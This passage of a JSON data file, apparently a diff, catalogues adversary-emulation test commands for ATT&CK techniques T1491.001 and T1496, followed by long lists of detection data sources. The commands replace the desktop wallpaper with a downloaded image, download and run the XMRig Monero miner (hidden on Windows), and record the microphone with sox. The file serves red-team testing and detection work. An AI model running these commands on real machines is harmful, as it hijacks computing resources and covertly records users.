"default": "$env:TEMP\\T1491.001-newWallpaper.png" + } + }, + "executor": { + "command": "$url = \"#{url_of_wallpaper}\"\n$imgLocation = \"#{wallpaper_location}\"\n$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\\Control Panel\\Desktop\\' -Name WallPaper).WallPaper\n$orgWallpaper | Out-File -FilePath \"#{pointer_to_orginal_wallpaper}\"\n$updateWallpapercode = @' \nusing 
System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\n$wc = New-Object System.Net.WebClient \ntry{ \n $wc.DownloadFile($url, $imgLocation)\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \ncatch [System.Net.WebException]{ \n Write-Host(\"Cannot download $url\") \n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($imgLocation)\n} \nfinally{ \n $wc.Dispose() \n}\n", + "cleanup_command": "$updateWallpapercode = @' \nusing System.Runtime.InteropServices; \nnamespace Win32{\n\n public class Wallpaper{ \n [DllImport(\"user32.dll\", CharSet=CharSet.Auto)] \n static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; \n \n public static void SetWallpaper(string thePath){ \n SystemParametersInfo(20,0,thePath,3); \n }\n }\n} \n'@\nif (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {\n $orgImg = Get-Content -Path \"#{pointer_to_orginal_wallpaper}\"\n add-type $updateWallpapercode \n [Win32.Wallpaper]::SetWallpaper($orgImg)\n}\nRemove-Item \"#{pointer_to_orginal_wallpaper}\" -ErrorAction Ignore\nRemove-Item \"#{wallpaper_location}\" -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1496", + "command_list": [ + "yes > /dev/null\n", + "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? 
-eq 124 ]\n", + "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n", + "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n", + "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n" + ], + "commands": [ + { + "command": "yes > /dev/null\n", + "source": "atomics/T1496/T1496.yaml", + "name": "Atomic Red Team Test - Resource Hijacking" + }, + { + "command": "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? 
-eq 124 ]\n", + "source": "data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml", + "name": "Download and execute Monero miner (xmrig) for 1 minute" + }, + { + "command": "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n", + "source": "data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml", + "name": "Download and execute Monero miner (xmrig) for 1 minute" + }, + { + "command": "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n", + "source": "data/abilities/impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml", + "name": "Download and execute Monero miner (xmrig) for 1 minute" + }, + { + "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n", + "source": "data/abilities/impact/78524da1-f347-4fbb-9295-209f1f408330.yml", + "name": "Install sox and record microphone for n-seconds" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1496", + "display_name": "Resource Hijacking", + "atomic_tests": [ + { + "name": "macOS/Linux - Simulate CPU Load with Yes", + "auto_generated_guid": "904a5a0e-fb02-490d-9f8d-0e256eb37549", + "description": "This test simulates a high CPU load as you might observe during cryptojacking attacks.\nEnd the test by using CTRL/CMD+C to break.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "command": "yes > /dev/null\n", + "name": "bash" + } + } + ] + }, + { + "id": "46da2385-cf37-49cb-ba4b-a739c7a19de4", + "name": "Crypto (Monero) Mining", + "description": "Download and execute 
Monero miner (xmrig) for 1 minute", + "tactic": "impact", + "technique": { + "attack_id": "T1496", + "name": "Resource Hijacking" + }, + "platforms": { + "linux": { + "sh": { + "command": "wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;\ntar -xf xmrig-6.11.2-linux-x64.tar.gz;\ntimeout 60 ./xmrig-6.11.2/xmrig;\n[ $? -eq 124 ]\n", + "cleanup": "rm -rf ./xmrig*;\n", + "timeout": 120 + } + }, + "darwin": { + "sh": { + "command": "curl -OL https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-macos-x64.tar.gz;\ntar -xf xmrig-6.11.2-macos-x64.tar.gz;\nscreen -S miner -dm ./xmrig-6.11.2/xmrig;\nsleep 60s;\nkillall xmrig;\nscreen -S miner -X quit\n", + "cleanup": "rm -rf ./xmrig*;\n", + "timeout": 120 + } + }, + "windows": { + "psh": { + "command": "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-msvc-win64.zip -OutFile xmrig-6.11.2-msvc-win64.zip;\nExpand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\\;\nStart-Process \".\\xmrig-6.11.2\\xmrig.exe\" -WindowStyle Hidden;\nStart-Sleep -Seconds 60;\nStop-Process -Name \"xmrig\"\n", + "cleanup": "rm ./xmrig* -r -fo;\n", + "timeout": 120 + } + } + } + }, + { + "id": "78524da1-f347-4fbb-9295-209f1f408330", + "name": "Record microphone", + "description": "Install sox and record microphone for n-seconds", + "tactic": "impact", + "technique": { + "attack_id": "T1496", + "name": "Resource Hijacking" + }, + "platforms": { + "darwin": { + "sh": { + "command": "brew install sox >/dev/null 2>&1;\nsox -d recording.wav trim 0 15 >/dev/null 2>&1;\n", + "timeout": 120 + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process 
creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands 
executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", 